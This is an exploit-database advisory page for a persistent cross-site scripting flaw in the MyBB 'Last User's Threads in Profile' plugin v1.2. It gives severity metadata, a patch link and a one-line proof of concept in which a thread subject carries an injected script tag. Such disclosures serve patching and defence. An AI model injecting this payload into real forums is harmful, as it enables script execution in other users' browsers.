header-logo
Suggest Exploit
vendor:
Last User's Threads in Profile Plugin
by:
0xB9
7.5
CVSS
HIGH
Persistent XSS
79
CWE
Product Name: Last User's Threads in Profile Plugin
Affected Version From: v1.2
Affected Version To: v1.2
Patch Exists: YES
Related CWE: N/A
CPE: N/A
Metasploit: N/A
Other Scripts: N/A
Platforms Tested: Ubuntu 17.10
2018

MyBB Last User’s Threads in Profile Plugin v1.2 – Persistent XSS

Display last threads in user profile. Create a thread with the following subject <p """><SCRIPT>alert("XSS")</SCRIPT>"> Now visit your profile to see the alert.

Mitigation:

Patch: https://github.com/vintagedaddyo/MyBB_Plugin_Last-User-s-Threads-in-Profile/commit/5e3b81450d0bf7935885db2622f1a42e5961258d
Source

Exploit-DB raw data:

# Exploit Title: MyBB Last User's Threads in Profile Plugin v1.2 - Persistent XSS
# Date: 3/19/2018
# Author: 0xB9
# Contact: luxorforums.com/User-0xB9 or 0xB9[at]protonmail.com
# Software Link: https://community.mybb.com/mods.php?action=view&pid=910
# Version: v1.2
# Tested on: Ubuntu 17.10


1. Description:
Display last threads in user profile.
 

2. Proof of Concept:

Persistent XSS
- Create a thread with the following subject <p """><SCRIPT>alert("XSS")</SCRIPT>">
- Now visit your profile to see the alert.


3. Solution:

Patch: https://github.com/vintagedaddyo/MyBB_Plugin_Last-User-s-Threads-in-Profile/commit/5e3b81450d0bf7935885db2622f1a42e5961258d